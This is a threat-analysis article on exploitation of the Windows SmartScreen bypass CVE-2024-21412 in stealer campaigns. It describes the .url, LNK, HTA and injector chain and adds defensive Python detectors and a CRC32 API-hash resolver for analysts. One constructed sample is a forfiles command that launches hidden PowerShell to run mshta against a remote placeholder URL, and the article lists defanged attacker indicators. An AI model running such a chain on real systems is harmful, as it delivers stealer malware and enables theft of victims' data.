A high-severity security feature bypass, tracked as CVE-2024-21412, has been identified in Microsoft Windows SmartScreen; Microsoft fixed it in the February 2024 security updates.
The flaw lies in how Windows handles Internet Shortcut (.url) files: a crafted shortcut that points at a second file on an attacker-controlled server is followed without SmartScreen applying its Mark-of-the-Web check to the nested reference, so the victim never sees the usual warning and a remote payload can be delivered. The victim still has to open the lure, which is why the campaigns below rely on phishing links.
Over the past year the vulnerability has been exploited in the wild by the Water Hydra group and by campaigns distributing the Lumma Stealer and Meduza Stealer infostealers.
Exploitation Details
FortiGuard Labs has observed a stealer campaign leveraging CVE-2024-21412 to download malicious executables. Attackers lure victims into clicking crafted links to Internet Shortcut (.url) files, which in turn download LNK files. These LNK files then fetch executables that carry an embedded HTA script.
Once executed, the HTA decrypts PowerShell code that retrieves the final-stage URLs, a decoy PDF, and a shell code injector. The injected stealer then collects data from the host and sends it to a command and control (C2) server.
Initial Access
The attack begins with a link that fetches a crafted Internet Shortcut (.url) file from the attacker's server. The shortcut's content points at a second, remote file (the LNK stage), and because of CVE-2024-21412 Windows follows that reference without the SmartScreen warning.
The LNK file's target uses the built-in “forfiles” command as a proxy to invoke PowerShell, so the PowerShell invocation is not the direct target of the shortcut; PowerShell then runs “mshta” to fetch an executable from the remote server “hxxps://21centuryart.com.”
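The two initial-access artefacts above, the nested .url reference and the forfiles-to-PowerShell-to-mshta LNK target, can be triaged from file content and process command lines alone. The following is an added example written for this page, not FortiGuard's tooling or code from the campaign. The .url bodies and the command line are constructed samples; the hosts in them (203.0.113.5, example.invalid, example.org) are placeholders, not indicators from the report. The WebDAV-style UNC path is included because such paths also reach a remote host, not because the report shows one.

```python
import configparser
import re
from urllib.parse import urlparse

# Constructed samples standing in for the artefacts in the report; the
# hosts are placeholders (RFC 5737 / .invalid / .org), not real indicators.
SAMPLE_LURE_URL_FILE = (
    "[InternetShortcut]\n"
    "URL=file://203.0.113.5/share/stage2.url\n"
    "IconIndex=13\n"
    "IconFile=C:\\Windows\\System32\\SHELL32.dll\n"
)
SAMPLE_WEBDAV_URL_FILE = (
    "[InternetShortcut]\n"
    "URL=\\\\203.0.113.5@80\\DavWWWRoot\\stage2.url\n"
)
SAMPLE_BENIGN_URL_FILE = "[InternetShortcut]\nURL=https://example.org/docs\n"
SAMPLE_LNK_TARGET = (
    r'C:\Windows\System32\forfiles.exe /p C:\Windows /m notepad.exe '
    r'/c "powershell -w hidden -c mshta https://example.invalid/x"'
)

REMOTE_SCHEMES = {"http", "https", "ftp", "file"}
UNC_RE = re.compile(r"^\\\\[^\\]+\\")  # \\host\share\... incl. \\host@80\DavWWWRoot\...


def parse_url_file(text: str) -> dict:
    """Parse the INI-style body of an Internet Shortcut into lower-cased keys."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        raise ValueError("not an Internet Shortcut file")
    return dict(cp.items("InternetShortcut"))


def is_remote_target(target: str) -> bool:
    """True if a path or URL reaches another host (UNC/WebDAV, http(s), ftp, file://host)."""
    t = target.strip()
    if UNC_RE.match(t):
        return True
    p = urlparse(t)
    return p.scheme.lower() in REMOTE_SCHEMES and bool(p.netloc)


def flag_url_file(text: str) -> list:
    """Reasons a .url body looks like a CVE-2024-21412 lure (empty list = nothing found)."""
    keys = parse_url_file(text)
    target = keys.get("url", "")
    reasons = []
    # The bypass hinges on an Internet Shortcut whose target is *another* .url
    # file on a remote host: Windows follows the nested reference without the
    # Mark-of-the-Web check that SmartScreen depends on.
    if target.strip().lower().endswith(".url") and is_remote_target(target):
        reasons.append("URL= points to another .url file on a remote host")
    icon = keys.get("iconfile", "")
    if icon and is_remote_target(icon):
        reasons.append("IconFile= points to a remote host")
    return reasons


def flag_lnk_target(cmdline: str) -> list:
    """Reasons an LNK target or process command line matches the forfiles -> PowerShell -> mshta chain."""
    low = cmdline.lower()
    reasons = []
    # forfiles /c runs its argument once per matched file; pointing /m at a
    # file that always exists (notepad.exe) makes it a one-shot proxy launcher.
    if "forfiles" in low and "/c" in low and re.search(r"powershell|pwsh", low):
        reasons.append("forfiles used as a proxy to launch PowerShell")
    if re.search(r"mshta(\.exe)?\b[^\n]*https?://", low):
        reasons.append("mshta fetching content from a remote URL")
    return reasons


if __name__ == "__main__":
    print(flag_url_file(SAMPLE_LURE_URL_FILE))
    print(flag_url_file(SAMPLE_WEBDAV_URL_FILE))
    print(flag_lnk_target(SAMPLE_LNK_TARGET))
```

The .url checks work on the raw file bytes from mail or proxy logs; the command-line heuristic is meant for Sysmon event 1 or EDR process-creation records and for the target string extracted from a .lnk. Both are string heuristics, so expect to tune them (for example, a legitimate admin script that really does use forfiles with PowerShell) before alerting on them.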
HTA Script Execution
Several LNK files were collected during the investigation, all downloading similar executables that carry an HTA script in the file's overlay (data appended after the PE image).
The HTA sets WINDOWSTATE="minimize" and SHOWTASKBAR="no" so that nothing visible appears when mshta runs it; it then executes the next stage of the infection chain.
After decoding and decrypting the script, the embedded PowerShell code downloads two files to the “%AppData%” folder: a decoy PDF, which is shown to the victim, and an executable that injects shell code for the next stage.
Shell Code Injector
Two types of injectors were identified in this attack chain. The first variant hides its shell code in an image file and had low detection rates on VirusTotal at the time of analysis.
The injector downloads a JPG file from the Imghippo image-hosting site, decodes bytes embedded in it to recover the shell code, and calls the shell code's entry point.
The shell code resolves the Windows APIs it needs by matching CRC32 hashes of export names rather than carrying the names in plaintext, creates a folder, and drops files in “%TEMP%”; the dropped payload was identified as HijackLoader.
The second injector decrypts its code from the executable's data section and uses a series of Windows API calls to inject the shell code.
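Shell code that resolves APIs by CRC32 hash, as described above, carries no import names, so an analyst rebuilds the mapping by hashing known export names and looking up the DWORDs found in the sample. The following is an added example for this page, not code from the malware or from FortiGuard. It assumes the hash is the standard CRC-32 (the zlib/IEEE variant) over the ASCII export name; real loaders often change the polynomial, seed or case handling, so `identify_variant` is there to confirm the scheme against one export before trusting the table. The export list and the "shell code" blob are constructed for illustration.

```python
import struct
import zlib
from typing import Dict, List, Optional, Tuple

# Constructed stand-in for names read from a DLL export directory (e.g. with
# pefile); a real lookup table covers every export of the DLLs a loader uses.
KNOWN_EXPORTS = {
    "kernel32.dll": ["VirtualAlloc", "VirtualProtect", "CreateDirectoryW",
                     "CreateFileW", "WriteFile", "LoadLibraryA", "GetProcAddress"],
    "ntdll.dll": ["NtAllocateVirtualMemory", "NtProtectVirtualMemory"],
}


def crc32_name(name: str) -> int:
    """Assumed hashing scheme: standard CRC-32 (zlib) over the ASCII export name."""
    return zlib.crc32(name.encode("ascii")) & 0xFFFFFFFF


def build_hash_table(exports: Dict[str, List[str]]) -> Dict[int, Tuple[str, str]]:
    """Map hash -> (dll, export) for every known export."""
    table = {}
    for dll, names in exports.items():
        for n in names:
            table[crc32_name(n)] = (dll, n)
    return table


def identify_variant(name: str, observed: int) -> Optional[str]:
    """Test a hash recovered from the sample against common tweaks of the scheme,
    using an export whose hash you already know (e.g. from the first resolved call)."""
    candidates = {
        "crc32(name)": crc32_name(name),
        "crc32(lower(name))": crc32_name(name.lower()),
        "crc32(name + NUL)": crc32_name(name + "\x00"),
        "~crc32(name)": crc32_name(name) ^ 0xFFFFFFFF,
    }
    for label, h in candidates.items():
        if h == observed:
            return label
    return None


def scan_for_hashes(blob: bytes, table: Dict[int, Tuple[str, str]]) -> List[Tuple[int, int, str, str]]:
    """Walk a blob byte by byte and report every little-endian DWORD that is a known hash.
    Returns (offset, hash, dll, export) tuples; the hash list in shell code is rarely aligned."""
    hits = []
    for off in range(len(blob) - 3):
        v = struct.unpack_from("<I", blob, off)[0]
        if v in table:
            hits.append((off, v) + table[v])
    return hits


def resolve_hashes(hashes, table: Dict[int, Tuple[str, str]]) -> Dict[int, Optional[Tuple[str, str]]]:
    """Resolve a list of hashes pulled from the sample; unknown hashes map to None."""
    return {h: table.get(h) for h in hashes}


# Constructed "shell code" fragment: three filler bytes followed by three API
# hashes, mimicking the hash list a resolver stub walks at start-up.
SAMPLE_BLOB = b"\x90\x90\xe8" + b"".join(
    struct.pack("<I", crc32_name(n)) for n in ("LoadLibraryA", "GetProcAddress", "CreateDirectoryW")
)

if __name__ == "__main__":
    table = build_hash_table(KNOWN_EXPORTS)
    for off, h, dll, export in scan_for_hashes(SAMPLE_BLOB, table):
        print(f"{off:#06x} {h:#010x} {dll}!{export}")
```

In practice the export names come from parsing the export directories of the DLLs the loader touches, and the first hash resolved is usually a bootstrap export such as LoadLibraryA or GetProcAddress; if that hash is not in the table, run `identify_variant` with the expected name to find which variant of the scheme the sample uses and rebuild the table accordingly.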
Final Stealers
This attack employs Meduza Stealer version 2.9, with its panel found at “hxxp://5[.]42[.]107[.]78/auth/login.”
[Figure: Meduza Stealer panel]
An ACR Stealer sample loaded by HijackLoader was also identified. It hides its C2 address on the Steam Community website using a dead drop resolver (DDR) technique: the binary only contains the address of a legitimate, high-reputation site, and the real C2 is read from content the attacker posted there, so the hard-coded indicator looks benign and the C2 can be rotated without touching the malware.
Additional ACR Stealer C2 servers were found on Steam by searching for the string “t6t.” After retrieving the C2 hostname, the stealer constructs a complete URL from it to fetch the encoded configuration from the remote server, which contains the information that drives the stealer's behavior.
Exploitation of CVE-2024-21412 by Water Hydra and by the Lumma Stealer and Meduza Stealer campaigns highlights the need for robust security controls around file-based phishing.
Users and administrators are advised to apply the February 2024 Windows security updates that fix CVE-2024-21412 promptly and to remain vigilant against suspicious links and files. Businesses can teach their customers not to open files from unknown sources to lessen the impact of these kinds of attacks.
Because threat actors keep inventing new delivery methods, protecting against these attack vectors requires a proactive strategy: timely patching, user education, and strict security policies that limit what a lured user can execute.